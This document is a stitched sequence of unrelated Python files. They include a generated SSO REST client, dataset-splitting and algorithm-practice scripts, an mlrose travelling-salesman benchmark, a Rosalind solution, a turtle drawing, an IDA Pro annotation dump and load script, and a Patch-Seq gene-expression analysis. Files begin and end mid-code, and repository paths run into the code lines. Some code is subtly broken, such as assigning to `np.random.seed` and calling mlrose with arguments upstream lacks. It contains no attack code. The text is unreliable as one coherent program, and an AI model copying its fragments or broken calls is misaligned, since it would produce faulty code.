:type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(SsoSettings, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'sso_settings' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_put" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'sso_settings' is set if self.api_client.client_side_validation and ('sso_settings' not in local_var_params or # noqa: E501 local_var_params['sso_settings'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `sso_settings` when calling `v1_sso_put`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'sso_settings' in local_var_params: body_params = local_var_params['sso_settings'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "SsoSettings", 400: "ApiError", } return self.api_client.call_api( '/v1/sso', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_validate_post(self, sso_metadata_url, **kwargs): # noqa: E501 """Endpoint for validation of a saml metadata url # noqa: E501 Validation of a content available under provided metadata URL. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_validate_post(sso_metadata_url, async_req=True) >>> result = thread.get() :param sso_metadata_url: url to validate (required) :type sso_metadata_url: SsoMetadataUrl :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. 
If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.v1_sso_validate_post_with_http_info(sso_metadata_url, **kwargs) # noqa: E501 def v1_sso_validate_post_with_http_info(self, sso_metadata_url, **kwargs): # noqa: E501 """Endpoint for validation of a saml metadata url # noqa: E501 Validation of a content available under provided metadata URL. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_validate_post_with_http_info(sso_metadata_url, async_req=True) >>> result = thread.get() :param sso_metadata_url: url to validate (required) :type sso_metadata_url: SsoMetadataUrl :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ local_var_params = locals() all_params = [ 'sso_metadata_url' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_validate_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'sso_metadata_url' is set if self.api_client.client_side_validation and ('sso_metadata_url' not in local_var_params or # noqa: E501 local_var_params['sso_metadata_url'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `sso_metadata_url` when calling `v1_sso_validate_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'sso_metadata_url' in local_var_params: body_params = local_var_params['sso_metadata_url'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = {} return self.api_client.call_api( '/v1/sso/validate', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) # -*- coding: utf-8 -*- import os from shutil import copyfile 
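# Usage sketch for the generated SSO API client whose v1_sso_* methods are defined
# above. The package and class names used here (`jamf`, `Configuration`, `ApiClient`,
# `SsoApi`) are assumptions for illustration only; the actual generated client may
# expose different names, so treat this as a sketch rather than the real API surface.
import jamf

configuration = jamf.Configuration(host="https://example.jamfcloud.com/api")
api_client = jamf.ApiClient(configuration)
sso_api = jamf.SsoApi(api_client)

# Paged, sorted history query; `sort` is sent as a multi-value query parameter.
history = sso_api.v1_sso_history_get(page=0, page_size=100, sort=["date:desc"])

# The same call run asynchronously: a worker thread is returned and joined via get().
thread = sso_api.v1_sso_history_get(page=0, page_size=100, async_req=True)
history_async = thread.get()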
from tqdm import tqdm from fire import Fire # import _init_paths # from utils import utils # def copy_files(src, dst, extensions={'.jpg'}, recurse=False): # files = utils.get_files(src, extensions=extensions, recurse=recurse) # print(f'"{src}" --> {len(files)}.\n') # for file in tqdm(files): # ID = file.name.split('_')[0] # dst_path = os.path.join(dst, ID) # if not os.path.isdir(dst_path): os.makedirs(dst_path) # copyfile(file, os.path.join(dst_path, file.name)) def main(root): train_path = os.path.join(root, 'bounding_box_train') dst = os.path.join(root, 'prepare_data') os.makedirs(dst, exist_ok=True) train_save_path = os.path.join(dst, 'train') val_save_path = os.path.join(dst, 'val') if not os.path.isdir(train_save_path): os.mkdir(train_save_path) os.mkdir(val_save_path) for root, dirs, files in tqdm(os.walk(train_path, topdown=True)): for name in files: if not name[-3:]=='jpg': continue ID = name.split('_') src_path = os.path.join(train_path, name) dst_path = os.path.join(train_save_path, ID[0]) if not os.path.isdir(dst_path): os.mkdir(dst_path) dst_path = os.path.join(val_save_path, ID[0]) #first image is used as val image os.mkdir(dst_path) copyfile(src_path, os.path.join(dst_path, name)) if __name__ == '__main__': Fire(main) from .rasa_denerator import RasaDenerator __version__ = '1.0.4'deehzee/dsalgopractice/coderust/t0_arrays/p01_max_sliding_window.py """ Problem ======= Given a large array of integers and a window of size ww, find the current maximum value in the window as the window slides through the entire array. Example ------- a = [-4, 2, -5, 3, 6] k = 3 (window size) expected output: [2, 3, 6] """ from collections import deque import numpy as np # Time: O(n) # Space: O(k) def max_in_sliding_window(arr, width): acc = [] win = deque() for i, a in enumerate(arr): #insert while win and arr[win[-1]] <= a: win.pop() win.append(i) # max if i >= width - 1: acc.append(arr[win[0]]) # remove if win[0] <= i - width + 1: win.popleft() if len(arr) < width: acc.append(arr[win[0]]) return acc ## Testing ## def generate_random_input(maxlen=20, maxent=30): n = np.random.randint(0, maxlen) arr = np.random.randint(1, maxent + 1, n) return arr def check(acc, arr, width): ans = True for i in range(len(arr) - width + 1): if acc[i] != max(arr[i:i + width]): ans = False break return ans def random_tests(seed=None, maxlen=20, maxent=30): np.random.seed = seed n = 0 try: while True: flag = False arr = generate_random_input(maxlen, maxent) for width in range(1, len(arr) + 1): n += 1 acc = max_in_sliding_window(arr, width) if not check(acc, arr, width): print(f'Test #{n}') print('arr:', arr) print('width:', width) flag = True break if flag: break except KeyboardInterrupt: print(f'\nPassed {n} tests.') if __name__ == '__main__': print('Performing random tests...') print('Press ^C to stop.') random_tests(seed=42, maxlen=100, maxent=150) assignment2/tsp.py0 import mlrose import numpy as np import pandas as pd from sklearn.datasets import load_iris from sklearn.model_selection import train_test_split from sklearn.preprocessing import MinMaxScaler, OneHotEncoder from sklearn.metrics import accuracy_score from alg_runner import sim_annealing_runner, rhc_runner, ga_runner, mimic_runner from plotting import plot_montecarlo_sensitivity import pickle from datetime import datetime import logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) np.random.seed(1) problem_size = 25 if __name__ == "__main__": # # TODO Write 
state regeneration functions as lamdas # prob_size_int = int(problem_size) # weights = [int(np.random.randint(1, prob_size_int/2)) for _ in range(prob_size_int)] # values = [int(np.random.randint(1, prob_size_int/2)) for _ in range(prob_size_int)] # flip_fit = mlrose.TSP(weights, values) # flop_state_gen = lambda: np.random.randint(prob_size_int//4, prob_size_int//2, size=prob_size_int) # init_state = flop_state_gen() # problem = mlrose.DiscreteOpt(length=prob_size_int, fitness_fn=flip_fit, maximize=True, max_val=2) # all_results = {} # print("Running simulated annealing montecarlos") # sa_results, sa_timing = sim_annealing_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'sim_anneal', sa_results) # plot_montecarlo_sensitivity('TSP', 'sim_anneal_timing', sa_timing) # all_results['SA'] = [sa_results, sa_timing] # print("Running random hill montecarlos") # rhc_results, rhc_timing = rhc_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'rhc', rhc_results) # plot_montecarlo_sensitivity('TSP', 'rhc_timing', sa_timing) # all_results['RHC'] = [rhc_results, rhc_timing] # print("Running genetic algorithm montecarlos") # ga_results, ga_timing = ga_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'ga', ga_results) # plot_montecarlo_sensitivity('TSP', 'ga_timing', ga_timing) # all_results['GA'] = [ga_results, ga_timing] # print("Running MIMIC montecarlos") # mimic_results, mimic_timing = mimic_runner(problem, init_state, state_regenerator=flop_state_gen) # plot_montecarlo_sensitivity('TSP', 'mimic', mimic_results) # plot_montecarlo_sensitivity('TSP', 'mimic_timing', mimic_timing) # all_results['MIMIC'] = [mimic_results, mimic_timing] # with open('./output/TSP/flipflip_data.pickle', 'wb') as handle: # pickle.dump(all_results, handle, protocol=pickle.HIGHEST_PROTOCOL) problem_size_space = np.linspace(5, 50, 2, dtype=int) best_fit_dict = {} best_fit_dict['Problem Size'] = problem_size_space best_fit_dict['Random Hill Climbing'] = [] best_fit_dict['Simulated Annealing'] = [] best_fit_dict['Genetic Algorithm'] = [] best_fit_dict['MIMIC'] = [] times = {} times['Problem Size'] = problem_size_space times['Random Hill Climbing'] = [] times['Simulated Annealing'] = [] times['Genetic Algorithm'] = [] times['MIMIC'] = [] fits_per_iteration = {} fits_per_iteration['Random Hill Climbing'] = [] fits_per_iteration['Simulated Annealing'] = [] fits_per_iteration['Genetic Algorithm'] = [] fits_per_iteration['MIMIC'] = [] for prob_size in problem_size_space: logger.info("---- Problem size: " + str(prob_size) + " ----") prob_size_int = int(prob_size) flip_fit = mlrose.TravellingSales.autogenerate(prob_size_int) tsp_state_gen = lambda: np.random.choice(prob_size_int, prob_size_int, replace=False) init_state = np.arange(prob_size_int) np.random.shuffle(init_state) problem = mlrose.TSPOpt(prob_size_int, maximize=False, coords=init_state) start = datetime.now() _, best_fitness_sa, fit_array_sa = mlrose.simulated_annealing(problem, schedule=mlrose.ExpDecay(exp_const=.0001, init_temp=5.), max_attempts=50, max_iters=3000, init_state=init_state, track_fits=True) best_fit_dict['Simulated Annealing'].append(best_fitness_sa) end = datetime.now() times['Simulated Annealing'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_rhc, fit_array_rhc = mlrose.random_hill_climb(problem, max_attempts=20, max_iters=3000, restarts=25, track_fits=True, init_state=init_state) 
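# Caveat: `track_fits=True` and `mlrose.TravellingSales.autogenerate(...)` are not part
# of the upstream mlrose API and appear to rely on a locally patched fork. A rough
# equivalent with stock mlrose (an assumption, not what this script actually ran) uses
# `curve=True`, which returns the per-iteration fitness curve as the third value:
#     coords = [tuple(xy) for xy in np.random.uniform(size=(prob_size_int, 2))]
#     problem = mlrose.TSPOpt(length=prob_size_int, coords=coords, maximize=False)
#     _, best_fitness_rhc, fit_array_rhc = mlrose.random_hill_climb(
#         problem, max_attempts=20, max_iters=3000, restarts=25, curve=True)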
best_fit_dict['Random Hill Climbing'].append(best_fitness_rhc) end = datetime.now() times['Random Hill Climbing'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_ga, fit_array_ga = mlrose.genetic_alg(problem, pop_size=prob_size_int*15, max_iters=10000, mutation_prob=.15, max_attempts=200, track_fits=True) best_fit_dict['Genetic Algorithm'].append(best_fitness_ga) end = datetime.now() times['Genetic Algorithm'].append((end-start).total_seconds()) start = datetime.now() _, best_fitness_mimic, fit_array_mimic = mlrose.mimic(problem, pop_size=prob_size_int*10, max_iters=10000, keep_pct=.1, max_attempts=100, track_fits=True) best_fit_dict['MIMIC'].append(best_fitness_mimic) end = datetime.now() times['MIMIC'].append((end-start).total_seconds()) # For the last fit that occurs, save off the fit arrays that are generated. We will plot fitness/iteration. fits_per_iteration['Random Hill Climbing'] = fit_array_rhc fits_per_iteration['Simulated Annealing'] = fit_array_sa fits_per_iteration['Genetic Algorithm'] = fit_array_ga fits_per_iteration['MIMIC'] = fit_array_mimic fit_frame = pd.DataFrame.from_dict(best_fit_dict, orient='index').transpose() # fit_frame.pop('Unnamed: 0') # idk why this shows up. time_frame = pd.DataFrame.from_dict(times, orient='index').transpose() # time_frame.pop('Unnamed: 0') # idk why this shows up. fit_iteration_frame = pd.DataFrame.from_dict(fits_per_iteration, orient='index').transpose() fit_frame.to_csv('./output/TSP/problem_size_fit.csv') time_frame.to_csv('./output/TSP/problem_size_time.csv') fit_iteration_frame.to_csv('./output/TSP/fit_per_iteration.csv')David-boo/RosalindRosalind_LGIS.py # Code on Python 3.7.4 # Working @ Dec, 2020 # david-boo.github.io # Messy code, working but improvable. TODO. data = open('./rosalind_LGIS.txt', 'r').read().splitlines() maxnum = int(data[0]) perm = [int(x) for x in data[1].split()] def lgis(maxnum, perm): levels = [] graph = {} for i in perm: if len(levels) == 0: levels.append([i]) graph[i] = 0 else: for lev in reversed(range(len(levels) + 1)): if i in graph.keys(): break if lev == 0: levels[0].append(i) graph[i] = 0 break lower_lev = levels[lev-1] lt = [x for x in lower_lev if x < i] if len(lt) > 0: if len(levels) == lev: levels.append([i]) else: levels[lev].append(i) lev_gt = [x for x in levels[lev] if x > i] levels[lev] = list(set(levels[lev]).difference(set(lev_gt))) graph[i] = lt[0] # Get now the returned answer table res = [] i = levels[-1][0] while(i != 0): res.append(i) i = graph[i] res = list(reversed(res)) return res print(" ".join([str(x) for x in lgis(maxnum, perm)])) print(" ".join( list(reversed([str(x) for x in lgis(maxnum, list(reversed(perm)))]))))import turtle def draw_circle(pen): # outer circle pen.setposition(0, -280) pen.pendown() pen.begin_fill() pen.color('red') pen.pencolor('white') pen.circle(300) pen.end_fill() pen.penup() def draw_circle2(pen): # inner circle pen.pensize(2) pen.setposition(0, -230) pen.pendown() pen.begin_fill() pen.color('black') pen.circle(250) pen.end_fill() pen.penup() def draw_A(pen): # drawing ‘A’ pen.setposition(30, -110) pen.pendown() pen.begin_fill() pen.color('red') pen.pensize(10) pen.pencolor('white') pen.forward(23) pen.backward(123) pen.left(60) pen.backward(220) pen.right(60) pen.backward(100) pen.right(117) pen.backward(710) pen.right(63) pen.backward(110) pen.right(90) pen.backward(510) pen.right(90) pen.backward(100) pen.right(90) pen.backward(70) pen.end_fill() pen.penup() def draw_triangle(pen): # Triangle shape in ‘A’ to make it look like 2d 
pen.pensize(10) pen.setposition(53, -40) pen.pendown() pen.begin_fill() pen.color('black') pen.pencolor('white') pen.right(90) pen.forward(100) pen.right(115) pen.forward(250) pen.right(157) pen.forward(227) pen.end_fill() def draw_arrow(pen): # arrow pen.backward(80) pen.left(42) pen.forward(147) pen.right(83) pen.forward(140) if __name__ == '__main__': win = turtle.Screen() win.bgcolor('black') avengers = turtle.Turtle() avengers.speed(10) avengers.pensize(10) avengers.penup() draw_circle(avengers) draw_circle2(avengers) draw_A(avengers) draw_triangle(avengers) draw_arrow(avengers) avengers.hideturtle() turtle.done()kevinw/amuletthird_party/angle-chrome_m34/tests/enumerate_files.py import fnmatch import os import sys rootdirs = [ ] filetypes = [ ] foundTypesArg = False for i in range(1, len(sys.argv)): arg = sys.argv[i] if arg == "-types": foundTypesArg = True continue if foundTypesArg: filetypes.append(arg) else: rootdirs.append(arg) for rootdir in rootdirs: for root, dirnames, filenames in os.walk(rootdir): for file in filenames: for type in filetypes: if fnmatch.fnmatchcase(file, type): print os.path.join(root, file).replace("\\", "/") break from __future__ import print_function import os import ida_bytes import ida_enum import ida_nalt import ida_name import ida_offset import ida_struct import ida_typeinf import ida_ua import idautils import idc from ida_idaapi import BADADDR def get_dump_file(): return os.path.join(idautils.GetIdbDir(), 'dump.json') class Settings(object): """Handles miscellaneous global settings.""" KEY = 'settings' @staticmethod def dump(): return { 'compiler': idc.get_inf_attr(idc.INF_COMPILER).id, } @staticmethod def load(info): idc.set_inf_attr(idc.INF_COMPILER, info['compiler']) class Functions(object): """Handles names given to subroutines.""" KEY = 'functions' @staticmethod def dump(): ret = [] for addr in idautils.Functions(): name = ida_name.get_name(addr) if name.startswith('sub_') or name.startswith('nullsub_'): continue # For some reason, this get_type function doesn't include the name, # but the SetType function expects it. typ = ida_typeinf.idc_get_type(addr) if typ: typ = typ.replace('__cdecl', '__cdecl %s' % name) + ';' ret.append({ 'start': addr, 'name': name, 'type': typ, }) return ret @staticmethod def load(infos): idc.set_inf_attr(idc.INF_COMPILER, 6) for info in infos: ida_name.set_name(info['start'], info['name']) if info['type']: idc.SetType(info['start'], info['type']) class Enums(object): """Handles enum definitions.""" KEY = 'enums' @staticmethod def dump(): ret = [] for i in range(ida_enum.get_enum_qty()): enum_id = ida_enum.getn_enum(i) members = [] class V(ida_enum.enum_member_visitor_t): def visit_enum_member(self, cid, value): members.append({ 'value': value, 'name': ida_enum.get_enum_member_name(cid), }) return 0 ida_enum.for_all_enum_members(enum_id, V()) ret.append({ 'idx': ida_enum.get_enum_idx(enum_id), 'name': ida_enum.get_enum_name(enum_id), 'width': ida_enum.get_enum_width(enum_id), 'flag': ida_enum.get_enum_flag(enum_id), 'members': members, }) return ret @staticmethod def load(infos): for info in infos: enum_id = ida_enum.get_enum(info['name']) if enum_id == BADADDR: print('Creating new enum %s.' 
% info['name']) enum_id = ida_enum.add_enum( info['idx'], info['name'], info['flag'], ) else: ida_enum.set_enum_idx(enum_id, info['idx']) ida_enum.set_enum_flag(enum_id, info['flag']) ida_enum.set_enum_width(enum_id, info['width']) for member in info['members']: ida_enum.add_enum_member( enum_id, member['name'], member['value']) class Structs(object): """Handles struct definitions and uses of members as offsets to memory accesses.""" KEY = 'structs' @staticmethod def dump(): ret = [] for struct_idx, struct_id, struct_name in idautils.Structs(): struct = ida_struct.get_struc(struct_id) members = [{'offset': offset, 'name': name, 'size': size} for offset, name, size in idautils.StructMembers(struct_id)] # Find all xrefs to any members of this struct. xrefs = [] for offset, name, size in idautils.StructMembers(struct_id): member = ida_struct.get_member_by_name(struct, name) for xref in idautils.XrefsTo(member.id): d = { 'from': xref.frm, 'type': xref.type, } # Get offset base if it's an offset xref. if xref.type == 1: d['offset'] = ida_offset.get_offbase(xref.frm, 1) xrefs.append(d) ret.append({ 'idx': struct_idx, 'name': struct_name, 'members': members, 'xrefs': xrefs, }) return ret @staticmethod def load(infos): insn = ida_ua.insn_t() for info in infos: # Find or create struct. struct_id = ida_struct.get_struc_id(info['name']) if struct_id == BADADDR: print('Creating new struct %s.' % info['name']) struct_id = ida_struct.add_struc(info['idx'], info['name']) struct = ida_struct.get_struc(struct_id) ida_struct.set_struc_idx(struct, info['idx']) # Create struct members. for member in info['members']: ida_struct.add_struc_member( struct, member['name'], member['offset'], # flag 0, # opinfo_t instance... maybe it should sometimes be # something? None, member['size'], ) # Create xrefs to members of the struct as offsets. for xref in info['xrefs']: typ = xref['type'] # Offset xref. if typ == 1: # TODO figure out what second argument does. idc.op_plain_offset(xref['from'], 1, xref['offset']) # Read/write xrefs. elif typ in [2, 3]: ida_ua.create_insn(xref['from'], insn) idc.op_stroff(insn, 1, struct.id, 0) # TODO do the other cases come up? else: pass class Arrays(object): KEY = 'arrays' @staticmethod def dump(): return [] @staticmethod def load(infos): for info in infos: idc.make_array(info['start'], info['length']) class Data(object): """Handles struct/array definitions and labels in memory.""" KEY = 'data' @staticmethod def dump(): ret = [] for addr, name in idautils.Names(): flags = ida_bytes.get_flags(addr) if ida_bytes.has_dummy_name(flags) or ida_bytes.has_auto_name(flags) or not ida_bytes.is_data(flags): print('skip auto:', name) continue # Sometimes the auto-generated names don't actually usually have the # right flags set, so skip these auto-looking names. if any(name.startswith(s) for s in ['byte_', 'word_', 'dword_', 'unk_', 'jpt_']): continue # print('%08x' % addr, '%08x' % flags, name, # ida_bytes.is_data(flags)) sz = ida_bytes.get_item_size(addr) if ida_bytes.is_struct(flags): ti = ida_nalt.opinfo_t() ida_bytes.get_opinfo(ti, addr, 0, flags) # itemsize = ida_bytes.get_data_elsize(addr, flags, ti) typ = ida_struct.get_struc_name(ti.tid) else: # itemsize = ida_bytes.get_item_size(addr) typ = None ret.append({ 'address': addr, 'name': name, 'type': typ, 'sz': sz, 'flags': flags, }) return ret @staticmethod def load(infos): for info in infos: ida_name.set_name(info['address'], info['name']) # TODO this code is kind of mashed together... not sure of the # right way. 
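# Resolve the struct type id by name (BADADDR when the item is plain, untyped data),
# then re-create the definition at the saved address: create_struct() is applied only
# for struct-typed items, and create_data() re-applies the recorded flags and byte size.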
tid = ida_struct.get_struc_id( info['type']) if info['type'] else BADADDR if info['type']: print(info['type'], hex(tid)) ida_bytes.create_struct(info['address'], info['sz'], tid) ida_bytes.create_data( info['address'], info['flags'], info['sz'], tid) items = [Settings, Enums, Structs, Arrays, Data, Functions] danielmk/PatchSeq # -*- coding: utf-8 -*- """ Created on Sun Aug 2 20:46:53 2020 @author: Daniel """ import pandas as pd import scanpy as sc import matplotlib.pyplot as plt import seaborn as sns import numpy as np import statsmodels.api as sm # Load count and alignment data and merge them into one annotated dataframe adata = sc.read_h5ad(r"E:\Dropbox\Dropbox\01_SST Project_daniel\033_PatchSeq CA3 SO\transcriptomics\Patch-Seq\count_exons_introns_full_named_postqc.h5ad") full_df = pd.read_csv(r"C:\Users\Daniel\repos\PatchSeq\full_df.csv", index_col=0) ephys_df = pd.read_csv(r"C:\Users\Daniel\repos\PatchSeq\ephys_df.csv", index_col=0) adata.var_names_make_unique() adata.obs_names_make_unique() adata.obs = pd.concat([adata.obs, full_df], axis=1, sort=False, join='inner') adata.obs = adata.obs.loc[:, ~adata.obs.columns.duplicated()] adata = adata[adata.obs_names[adata.obs['ephys'] == 1],:] ephys_df['seq_id'] = np.array(ephys_df['seq_id'], dtype=np.str) adata.obs['PC vs IN Cluster'] = ephys_df.loc[adata.obs.index]['PC vs IN Cluster'] #mapping_df = ephys_df['seq_id'].copy() #mapping_df['seq_id'] = np.array(ephys_df['seq_id'], dtype=np.str) """ INTERNEURON MARKER CODE""" # Marker Names adata.obs['SST Positive'] = adata.obs_vector('Sst') > 0 adata.obs['Slc17a8 Positive'] = adata.obs_vector('Slc17a8') > 0 adata.obs['SST & Slc17a8 Positive'] = adata.obs['SST Positive'] & adata.obs['Slc17a8 Positive'] adata.obs['Transcriptomic Type'] = 'Other' adata.obs['Transcriptomic Type'][adata.obs['SST Positive']] = "SST RNA Positive" adata.obs['Transcriptomic Type'][adata.obs['Slc17a8 Positive']] = "Slc17a8 RNA Positive" adata.obs['Transcriptomic Type'][adata.obs['SST & Slc17a8 Positive']] = "SST & Slc17a8 RNA Positive" adata.obs['SST & Slc17a8 Coloc'] = 'Other' adata.obs['SST & Slc17a8 Coloc'][adata.obs['SST & Slc17a8 Positive']] = "SST & Slc17a8 Coloc" adata_log = sc.pp.log1p(adata, base=2, copy=True) adata_log.obs["SST Exp Log2"] = adata_log.obs_vector('Sst') adata_log.obs["Slc17a8 Exp Log2"] = adata_log.obs_vector('Slc17a8') # Seaborn Styling plt.rcParams['svg.fonttype'] = 'none' sns.set(context='paper', style='whitegrid', palette='colorblind', font='Arial', font_scale=2, color_codes=True) # SST vs VGLUT3 Scatter x = adata_log.obs_vector('Sst') y = adata_log.obs_vector('Slc17a8') adata.obs['Kcnt1 Expr'] = adata_log.obs_vector('Kcnt1') fig, ax = plt.subplots(1) sns.scatterplot(x=x, y=y, ax=ax, s=150, linewidth=0) ax.set_xlabel("Sst Expr Log2") ax.set_ylabel("Slc17a8 Expr Log2") # Genetic Expression #adata_log10 = sc.pp.log1p(adata, base=10, copy=True) sc.tl.rank_genes_groups(adata_log, groupby='SST & Slc17a8 Coloc', method='wilcoxon', key_added='diff_exp', pts=True, n_genes=50) sc.pl.heatmap(adata_log, var_names = np.array(adata_log.uns['diff_exp']['names']['SST & Slc17a8 Coloc'], dtype=np.str), groupby='SST & Slc17a8 Coloc') # Check for interneuron marker expression differences markers = ["Gad1", "Drd2", "Npy", 'Sst', "Chat", "Pvalb", "Htr3a", "Lhx6", "Tac1", "Cox6a2", "Sox11", "Slc17a8", 'Kcnt1'] # Excluded Markers: ['Gpr88', 'D830015G02Rik', 'Adora2a', 'Drd1a', 'Pthlh', # 'Chodl', 'Hhip', 'Mia', 'Slc5a7', 'Trh', 'lgfbp4', 'lgfbpl1'] stacked_violin = sc.pl.stacked_violin(adata_log, markers, 
groupby="Transcriptomic Type", stripplot=True, swap_axes=True, size=3) plt.xticks(rotation=0) # Run GLM adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes[~(classes == "SST & Slc17a8 RNA Positive")] = "Other" classes = classes.cat.remove_unused_categories() classes = pd.Categorical(classes).rename_categories([0,1]) poisson_model = sm.GLM(classes, features, family=sm.families.Binomial()) poisson_results = poisson_model.fit() print(poisson_results.summary()) classes= classes.rename_categories(["Other", "SST & Slc17a8 RNA Positive"]) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) fig, ax = plt.subplots(1) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df, ax=ax, s=10, alpha=0.8) ax.set_ylabel("GLM Prediction") f = open('glm_transcriptomic_type_output.csv','w') f.write(poisson_results.summary().as_csv()) f.close() """Interleukin Stuff for Tony""" """ markers = ["Gad1", "Npy", 'Sst', "Chat", "Th", "Pvalb", "Slc17a8", "Il18", "Il18r1"] # Excluded Markers: ['Gpr88', 'D830015G02Rik', 'Adora2a', 'Drd1a', 'Pthlh', # 'Chodl', 'Hhip', 'Mia', 'Slc5a7', 'Trh', 'lgfbp4', 'lgfbpl1'] stacked_violin = sc.pl.stacked_violin(adata_log, markers, groupby="Transcriptomic Type", stripplot=True, swap_axes=True, size=3) plt.xticks(rotation=0) # Run GLM adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes[~(classes == "SST & Slc17a8 RNA Positive")] = "Other" classes = classes.cat.remove_unused_categories() classes = pd.Categorical(classes).rename_categories([0,1]) poisson_model = sm.GLM(classes, features, family=sm.families.Binomial()) poisson_results = poisson_model.fit() print(poisson_results.summary()) classes= classes.rename_categories(["Other", "SST & Slc17a8 RNA Positive"]) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) fig, ax = plt.subplots(1) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df, ax=ax, s=10, alpha=0.8) ax.set_ylabel("GLM Prediction") """ """ # GLM on all classes adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes = pd.Categorical(classes).rename_categories([1,2,3,4]) poisson_model = sm.GLM(classes, features, family=sm.families.Poisson()) poisson_results = poisson_model.fit() print(poisson_results.summary()) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df) """# -*- coding: utf-8 -*- """This module has Vector object using openMaya.api MIT License Copyright (c) 2020 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
